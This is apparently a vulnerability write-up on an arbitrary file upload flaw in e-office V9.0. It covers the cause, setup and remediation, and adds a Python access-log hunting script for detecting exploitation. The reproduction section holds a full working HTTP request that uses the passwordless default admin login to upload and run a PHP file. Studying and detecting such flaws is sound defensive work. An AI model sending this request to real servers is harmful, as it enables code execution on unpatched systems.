1. Vulnerability detection script
A simple detection script I wrote myself; take a look if you are interested.
2. Vulnerability causes
This vulnerability is caused by e-office failing to correctly process user input in the upload module. An attacker can construct a malicious upload request to achieve arbitrary code execution. The vendor's fix performs whitelist verification on the extension of the uploaded file. The following is the official code snippet after the vulnerability was fixed:
3. Affected versions
The version affected by this vulnerability is V9.0.
4. Test environment setup
Just run the e-office software you downloaded yourself.
This is the default IP address and port number from your own installation.
5. Vulnerability reproduction
Opening the site in a browser shows the following login page. The default account is admin, and no password is required.
When you log in and capture the traffic, pay attention to the PHPSESSID in the response. If you want to write a detection script, you need to obtain it; needless to say, it is used for identity verification.
Then click on the login page to capture a request and modify the request as follows. When you see logo-eoffice.php, the upload was successful.
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: win-08mtfbul1kp:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://win-08mtfbul1kp:8082/general/index9.php
Cookie: LOGIN_LANG=cn; PHPSESSID=e84040eb45cb321d9806d2e0518c1ba0
Content-Length: 194
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
Visit the following address:
http://win-08mtfbul1kp:8082/images/logo/logo-eoffice.php
You can see that the code runs successfully. Alternatively, you can check the local folder to confirm that the file was uploaded.
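On the defensive side, the upload request and the resulting file described above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post or the vendor's code: it flags the logo-upload request and any non-image file requested under /images/logo/. The combined log format, the image extension allow-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Client, method, target and status of a combined-format access log line (assumed format).
LINE_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')
UPLOAD_PATH = "/general/index/uploadfile.php"  # compared lowercased (Windows host)
LOGO_DIR = "/images/logo/"
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "bmp", "ico"}  # assumed allow-list

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:05 +0800] "POST /general/index/UploadFile.php'
    '?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 20',
    '192.0.2.10 - - [01/Jan/2022:10:00:09 +0800] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 90211',
    '192.0.2.20 - - [01/Jan/2022:10:01:00 +0800] "GET /images/logo/logo-eoffice.png HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Jan/2022:10:02:00 +0800] "GET /images/logo/logo-eoffice.php HTTP/1.1" 404 0',
]

def classify(line):
    """Return (kind, client, target, status) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    query = {k.lower(): [v.lower() for v in vs]
             for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    if (method == "POST" and path == UPLOAD_PATH
            and "uploadpicture" in query.get("m", [])
            and "eoffice_logo" in query.get("uploadtype", [])):
        return ("logo_upload", client, target, int(status))
    name = path[len(LOGO_DIR):] if path.startswith(LOGO_DIR) else ""
    if name and name.rpartition(".")[2] not in IMAGE_EXTS:
        return ("non_image_in_logo_dir", client, target, int(status))
    return None

def hunt(lines):
    """Flag suspicious lines; escalate a served non-image logo file that follows an upload."""
    uploaders, findings = set(), []
    for line in lines:
        if (hit := classify(line)) is None:
            continue
        kind, client, target, status = hit
        if kind == "logo_upload":
            uploaders.add(client)
        elif status == 200 and client in uploaders:
            kind = "upload_then_served"  # same client uploaded, then got a 200
        findings.append((kind, client, target))
    return findings
```

Correlating by client address is a simplification; a legitimate logo change also produces a `logo_upload` finding, so the non-image request is the stronger signal.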
6. Remediation
The vendor has provided a patch for this vulnerability, and users are advised to download and apply it:
http://v10.e-office.cn/eoffice9update/safepack.zip